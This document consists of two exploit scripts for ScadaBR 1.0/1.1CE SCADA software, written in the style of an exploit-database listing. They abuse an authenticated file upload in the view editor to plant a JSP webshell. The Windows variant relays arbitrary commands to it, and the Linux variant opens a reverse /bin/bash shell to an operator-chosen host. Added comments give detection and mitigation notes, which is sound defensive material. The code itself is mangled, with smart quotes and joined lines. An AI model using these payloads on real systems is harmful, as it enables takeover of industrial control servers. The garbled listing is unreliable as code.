
# Exploit Title: ScadaBR 1.0 – Arbitrary File Upload (Authenticated) (1)
# Date: 03/2021
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://www.scadabr.com.br/
# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
# Tested on: Windows7, Windows10

#!/usr/bin/python

import requests,sys,time

# Usage guard. The script expects four positional arguments (target host,
# port, username, password — see the assignments below). This is an
# *authenticated* exploit: it only works with a valid ScadaBR login, and the
# example invocation uses the admin/admin pair. Defender note: keeping the
# ScadaBR web interface off untrusted networks and replacing default
# credentials removes the precondition this script depends on.
# (The listing as rendered here is mangled — smart quotes, joined lines —
# and is not runnable as shown.)
if len(sys.argv) < =4:
print(‘[x] Missing arguments … ‘)
print(‘[>] Usage: python WinScada_RCE.py ‘)
print(‘[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin’)
sys.exit(0)
else:
time.sleep(1)

# Positional arguments (several assignments were run together on one line
# when the page was rendered).
host = sys.argv[1]port = sys.argv[2]user = sys.argv[3]passw = sys.argv[4]

# Endpoints used by main(): the login form and the graphical-view editor.
# Defender note: the request sequence this script produces is a POST to
# /ScadaBR/login.htm followed by a multipart POST to /ScadaBR/view_edit.shtm
# and then GETs under /ScadaBR/uploads/ — a useful pattern for web-log alerts.
flag = False
LOGIN = ‘http://’+host+’:’+port+’/ScadaBR/login.htm’
PROTECTED_PAGE = ‘http://’+host+’:’+port+’/ScadaBR/view_edit.shtm’

# ASCII-art banner printed at start-up; purely cosmetic.
banner = ”’
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ .___ ____________________ |
| / _____/ ____ _____ __| _/____ ______ ______ |
| _____ _/ ___\__ / __ |__ | | _/| _/ |
| / ___ / __ _/ /_/ | / __ | | | | |
| /_______ /___ >____ /____ |(____ /______ /|____|_ / |
| / / / / / / / |
| |
| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
| > Exploit Author : Fellipe Oliveira |
| > Exploit for Windows Systems |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
”’

# Entry point: log in, upload a JSP file through the graphical-view
# background-image field, locate the stored file under /ScadaBR/uploads/,
# then relay commands to it. Reads the module-level host/port/user/passw,
# LOGIN, PROTECTED_PAGE and banner; exits via sys.exit on failure.
def main():
# Credentials are sent as ordinary form fields to the login page.
payload = {
‘username’: user,
‘password’: passw
}

print(banner)
time.sleep(2)

# A single requests session so the login cookie is reused by every
# later request.
with requests.session() as s:
s.post(LOGIN, data=payload)
response = s.get(PROTECTED_PAGE)

print(“[+] Trying to authenticate “+LOGIN+”…”)
# An HTTP 200 on the view editor page is taken as proof of authentication.
if response.status_code == 200:
print(“[+] Successfully authenticated! :D~n”)
time.sleep(2)
else:
print(“[x] Authentication failed :(“)
sys.exit(0)

# Upload request (captured from Burp, hence the burp0_* names): a
# multipart POST to the graphical-view editor. The backgroundImageMP part
# — meant to hold the view's background image — carries a file named
# win_cmd.jsp declared as application/octet-stream. The probe loop below
# assumes the server stores it under a numeric name but keeps the .jsp
# extension in a servable directory.
# Defender notes: alert on multipart POSTs to /ScadaBR/view_edit.shtm whose
# backgroundImageMP filename is not an image type, and on any .jsp file
# appearing under the ScadaBR uploads directory. Mitigation on the server
# side is to validate/normalise uploaded images and store them outside
# any path that the servlet container will execute.
burp0_url = “http://”+host+”:”+port+”/ScadaBR/view_edit.shtm”
# Static JSESSIONID: appears to be the session id from the author's captured
# request; it is sent explicitly in addition to the session object's cookies.
burp0_cookies = {“JSESSIONID”: “66E47DFC053393AFF6C2D5A7C15A9439”}
burp0_headers = {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”, “Accept-Language”: “en-US,en;q=0.5”, “Accept-Encoding”: “gzip, deflate”, “Content-Type”: “multipart/form-data; boundary=—————————6150838712847095098536245849”, “Origin”: “http://”+host+”:”+port+”/”, “Connection”: “close”, “Referer”: “http://”+host+”:”+port+”/ScadaBR/view_edit.shtm”, “Upgrade-Insecure-Requests”: “1”}
# Multipart body. The embedded JSP runs the value of the `cmd` query
# parameter through Runtime.exec (prefixed with cmd.exe /C on Windows) and
# echoes the process output into the page. The other form parts
# (view.name, view.xid, upload, view.anonymousAccess) mirror a normal
# "Upload image" submission of the view editor.
burp0_data = “—————————–6150838712847095098536245849rnContent-Disposition: form-data; name=”view.name”rnrnrn—————————–6150838712847095098536245849rnContent-Disposition: form-data; name=”view.xid”rnrnGV_218627rn—————————–6150838712847095098536245849rnContent-Disposition: form-data; name=”backgroundImageMP”; filename=”win_cmd.jsp”rnContent-Type: application/octet-streamrnrn< %@ page import="java.util.*,java.io.*"%>n< %n%>n

nCommands with JSPn
nnn

n

n< %nif (request.getParameter("cmd") != null) {n    out.println("Command: " + request.getParameter("cmd") + "
");n Process p;n if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){n p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));n }n else{n p = Runtime.getRuntime().exec(request.getParameter("cmd"));n }n OutputStream os = p.getOutputStream();n InputStream in = p.getInputStream();n DataInputStream dis = new DataInputStream(in);n String disr = dis.readLine();n while ( disr != null ) {n out.println(disr);n disr = dis.readLine();n }n}n%>n

nnrn—————————–6150838712847095098536245849rnContent-Disposition: form-data; name=”upload”rnrnUpload imagern—————————–6150838712847095098536245849rnContent-Disposition: form-data; name=”view.anonymousAccess”rnrn0rn—————————–6150838712847095098536245849–rn”
getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print(‘[>] Attempting to upload .jsp Webshell…’)
time.sleep(1)
print(‘[>] Verifying shell upload…n’)
time.sleep(2)

# Only the HTTP status of the upload POST is checked here; whether the
# file actually landed is established by the probe loop below.
if getdata.status_code == 200:
print(‘[+] Upload Successfuly!’)

# Locate the stored file by requesting /ScadaBR/uploads/1.jsp … 499.jsp
# until one answers 200. Defender note: this produces a burst of sequential
# GETs to /ScadaBR/uploads/<n>.jsp from one session, almost all 404s —
# a distinctive access-log signature.
for num in range(1,500):
PATH = ‘http://’+host+’:’+port+’/ScadaBR/uploads/%d.jsp’ % (num)
find = s.get(PATH)

if find.status_code == 200:
print(‘[+] Webshell Found in: http://’+host+’:’+port+’/ScadaBR/uploads/%d.jsp’ % (num))
flag = True
print(‘[>] Spawning fake shell…’)
time.sleep(3)

# Interactive loop: each line read from the operator is sent as the `cmd`
# query parameter of the uploaded JSP and the response body is printed.
# Defender note: GET requests to /ScadaBR/uploads/*.jsp carrying a `cmd`
# parameter are the per-command indicator. `flag` is never cleared, so the
# loop runs until the process is interrupted.
while flag:
param = raw_input(“# “)
burp0_url = “http://”+host+”:”+port+”/ScadaBR/uploads/%d.jsp?cmd=%s” % (num,param)
burp0_cookies = {“JSESSIONID”: “4FCC12402B8389A64905F4C8272A64B5”}
burp0_headers = {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”, “Accept-Language”: “en-US,en;q=0.5”, “Accept-Encoding”: “gzip, deflate”, “Connection”: “close”, “Referer”: “http://”+host+”:”+port+”/ScadaBR/uploads/%d.jsp?cmd=%s”, “Upgrade-Insecure-Requests”: “1”}
send = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
# Strips the JSP page's HTML wrapper from the response so only the command
# output remains (the replace targets are garbled in this rendering).
clean = send.text.replace(‘

', '').replace('
', '').replace('"GET" NAME="myform" ACTION="">', '').replace('Commands with JSP', '').replace('', '').replace('', '').replace('
', '').replace('
', '').replace('

‘, ”).replace(”, ”)
print(clean)

# Reached only when the last probe index also failed to return the file.
elif num == 499:
print(‘[x] Webshell not Found’)

# Upload POST did not return 200; report the server's reason phrase.
else:
print(‘Reason:’+getdata.reason+’ ‘)
print(‘Exploit Failed x_x’)

# Script entry point (only runs when executed directly, not when imported).
if __name__ == ‘__main__’:
main()

————————————-
# Exploit Title: ScadaBR 1.0 – Arbitrary File Upload (Authenticated) (2)
# Date: 04/21
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://www.scadabr.com.br/
# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
# Tested on: Debian9,10~Ubuntu16.04

#!/usr/bin/python

import requests,sys,time

# Usage guard. This Linux variant expects six positional arguments: target
# host, port, username, password, plus the listener host and port that the
# uploaded JSP will connect back to (see the assignments below). As with
# the Windows variant it is an *authenticated* exploit — a valid ScadaBR
# login is required, and the example invocation uses admin/admin.
# (The listing as rendered here is mangled — smart quotes, joined lines —
# and is not runnable as shown.)
if len(sys.argv) < =6:
print(‘[x] Missing arguments … ‘)
print(‘[>] Usage: python LinScada_RCE.py ‘)
print(‘[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444’)
sys.exit(0)
else:
time.sleep(1)

# Positional arguments (run together on one line by the page rendering).
# rev_host/rev_port are the operator's listener, passed to the JSP later.
host = sys.argv[1]port = sys.argv[2]user = sys.argv[3]passw = sys.argv[4]rev_host = sys.argv[5]rev_port = sys.argv[6]

# Endpoints used by main(): the login form and the graphical-view editor.
# Defender note: the request sequence is a POST to /ScadaBR/login.htm, a
# multipart POST to /ScadaBR/view_edit.shtm, sequential GETs under
# /ScadaBR/uploads/, and finally an outbound TCP connection from the
# ScadaBR host to rev_host:rev_port — the last of these is the strongest
# network-level indicator.
flag = False
LOGIN = ‘http://’+host+’:’+port+’/ScadaBR/login.htm’
PROTECTED_PAGE = ‘http://’+host+’:’+port+’/ScadaBR/view_edit.shtm’

# ASCII-art banner printed at start-up; purely cosmetic.
banner = ”’
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ .___ ____________________ |
| / _____/ ____ _____ __| _/____ ______ ______ |
| _____ _/ ___\__ / __ |__ | | _/| _/ |
| / ___ / __ _/ /_/ | / __ | | | | |
| /_______ /___ >____ /____ |(____ /______ /|____|_ / |
| / / / / / / / |
| |
| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
| > Exploit Author : Fellipe Oliveira |
| > Exploit for Linux Systems |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
”’

# Entry point: log in, upload a JSP file through the graphical-view
# background-image field, locate it under /ScadaBR/uploads/, then request
# it with the listener address so it opens a connection back to rev_host.
# Reads the module-level host/port/user/passw/rev_host/rev_port, LOGIN,
# PROTECTED_PAGE and banner; exits via sys.exit on failure or success.
def main():
# Credentials are sent as ordinary form fields to the login page.
payload = {
‘username’: user,
‘password’: passw
}

print(banner)
time.sleep(2)

# A single requests session so the login cookie is reused by every
# later request.
with requests.session() as s:
s.post(LOGIN, data=payload)
response = s.get(PROTECTED_PAGE)

print “[+] Trying to authenticate “+LOGIN+”…”
# An HTTP 200 on the view editor page is taken as proof of authentication.
if response.status_code == 200:
print “[+] Successfully authenticated! :D~n”
time.sleep(2)
else:
print “[x] Authentication failed :(“
sys.exit(0)

# Upload request (captured from Burp): a multipart POST to the graphical-
# view editor. The backgroundImageMP part carries a file named
# webshell.jsp while declaring Content-Type image/png, i.e. the declared
# MIME type is an image but the extension is not. The probe loop below
# assumes the server keeps the .jsp extension under /ScadaBR/uploads/.
# Defender notes: alert on multipart POSTs to /ScadaBR/view_edit.shtm whose
# backgroundImageMP filename does not end in an image extension regardless
# of the declared Content-Type, and on .jsp files appearing in the uploads
# directory. Server-side mitigation is to validate uploaded images by
# content and store them where the servlet container will not execute them.
burp0_url = “http://”+host+”:”+port+”/ScadaBR/view_edit.shtm”
# Static JSESSIONID: appears to be the session id from the author's captured
# request; it is sent explicitly in addition to the session object's cookies.
burp0_cookies = {“JSESSIONID”: “8DF449C72D2F70704B8D997971B4A06B”}
burp0_headers = {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”, “Accept-Language”: “en-US,en;q=0.5”, “Accept-Encoding”: “gzip, deflate”, “Content-Type”: “multipart/form-data; boundary=—————————32124376735876620811763441977”, “Origin”: “http://”+host+”:”+port+”/”, “Connection”: “close”, “Referer”: “http://”+host+”:”+port+”/ScadaBR/view_edit.shtm”, “Upgrade-Insecure-Requests”: “1”}
# Multipart body. The embedded JSP defines a StreamConnector thread that
# copies one stream to another; on a request carrying `ipaddress` and
# `port` it opens a Socket to that address, starts /bin/bash, and wires the
# process streams to the socket. It prints a status paragraph when both the
# socket and the process were created — the length check after the GET
# below relies on that. Defender note: on the ScadaBR host this shows up as
# the Java/Tomcat process spawning /bin/bash and making an outbound TCP
# connection to an operator-chosen ip:port.
burp0_data = “—————————–32124376735876620811763441977rnContent-Disposition: form-data; name=”view.name”rnrnrn—————————–32124376735876620811763441977rnContent-Disposition: form-data; name=”view.xid”rnrnGV_369755rn—————————–32124376735876620811763441977rnContent-Disposition: form-data; name=”backgroundImageMP”; filename=”webshell.jsp”rnContent-Type: image/pngrnrn < %@page import="java.lang.*"%>n< %@page import="java.util.*"%>n< %@page import="java.io.*"%>n< %@page import="java.net.*"%>nn< %nclass StreamConnector extends Thread {n InputStream is;n OutputStream os;n StreamConnector(InputStream is, OutputStream os) {n this.is = is;n this.os = os;n }n public void run() {n BufferedReader isr = null;n BufferedWriter osw = null;n try {n isr = new BufferedReader(new InputStreamReader(is));n osw = new BufferedWriter(new OutputStreamWriter(os));n char buffer[] = new char[8192];n int lenRead;n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {n osw.write(buffer, 0, lenRead);n osw.flush();n }n } catch (Exception e) {n System.out.println(“exception: ” + e.getMessage());n }n try {n if (isr != null)n isr.close();n if (osw != null)n osw.close();n } catch (Exception e) {n System.out.println(“exception: ” + e.getMessage());n }n }n}n%>nn

Payload JSP to Reverse Shell

n

Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process

n

ntIP AddressntPortntn

nn< %n String ipAddress = request.getParameter("ipaddress");n String ipPort = request.getParameter("port");n Socket sock = null;n Process proc = null;n if (ipAddress != null && ipPort != null) {n try {n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());n System.out.println("socket created: " + sock.toString());n Runtime rt = Runtime.getRuntime();n proc = rt.exec("/bin/bash");n System.out.println("process /bin/bash started: " + proc.toString());n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());n System.out.println("outputConnector created: " + outputConnector.toString());n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());n System.out.println("inputConnector created: " + inputConnector.toString());n outputConnector.start();n inputConnector.start();n } catch (Exception e) {n System.out.println("exception: " + e.getMessage());n }n }n if (sock != null && proc != null) {n out.println("

“);n out.println(“

Process /bin/bash, running as (” + proc.toString() + “, is connected to socket ” + sock.toString() + “.

“);n }n%>nnrn—————————–32124376735876620811763441977rnContent-Disposition: form-data; name=”upload”rnrnUpload imagern—————————–32124376735876620811763441977rnContent-Disposition: form-data; name=”view.anonymousAccess”rnrn0rn—————————–32124376735876620811763441977–rn”
getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print(‘[>] Attempting to upload .jsp Webshell…’)
time.sleep(1)
print(‘[>] Verifying shell upload…n’)
time.sleep(2)

# Only the HTTP status of the upload POST is checked here; whether the
# file actually landed is established by the probe loop below.
if getdata.status_code == 200:
print(‘[+] Upload Successfuly! n’)

# Locate the stored file by requesting /ScadaBR/uploads/1.jsp … 999.jsp
# until one answers 200. Defender note: a burst of sequential GETs to
# /ScadaBR/uploads/<n>.jsp from one session, almost all 404s, is a
# distinctive access-log signature.
for num in range(1,1000):
PATH = ‘http://’+host+’:’+port+’/ScadaBR/uploads/%d.jsp’ % (num)
find = s.get(PATH)

if find.status_code == 200:
print(‘[+] Webshell Found in: http://’+host+’:’+port+’/ScadaBR/uploads/%d.jsp’ % (num))
print(‘[>] Spawning Reverse Shell…n’)
time.sleep(3)

# Trigger request: the listener address is passed to the JSP as the
# `ipaddress` and `port` query parameters together with Connect=Connect.
# Defender note: a GET to /ScadaBR/uploads/*.jsp with these parameters,
# followed by an outbound connection from the server, is the indicator.
burp0_url = “http://”+host+”:”+port+”/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect” % (num,rev_host,rev_port)
burp0_cookies = {“JSESSIONID”: “8DF449C72D2F70704B8D997971B4A06B”}
burp0_headers = {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”, “Accept-Language”: “en-US,en;q=0.5”, “Accept-Encoding”: “gzip, deflate”, “Connection”: “close”, “Upgrade-Insecure-Requests”: “1”}
r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
time.sleep(5)

# Success heuristic: a response body longer than 401 characters is taken
# to mean the JSP printed its "connected" paragraph; the script does not
# itself verify that the listener received anything.
if len(r.text) > 401:
print(‘[+] Connection received’)
sys.exit(0)
else:
print(‘[x] Failed to receive reverse connection …n’)

# Reached only when the last probe index also failed to return the file.
elif num == 999:
print(‘[x] Failed to found Webshell … ‘)

# Upload POST did not return 200; report the server's reason phrase.
else:
print(‘Reason:’+getdata.reason+’ ‘)
print(‘Exploit Failed x_x’)

# Script entry point (only runs when executed directly, not when imported).
if __name__ == ‘__main__’:
main()
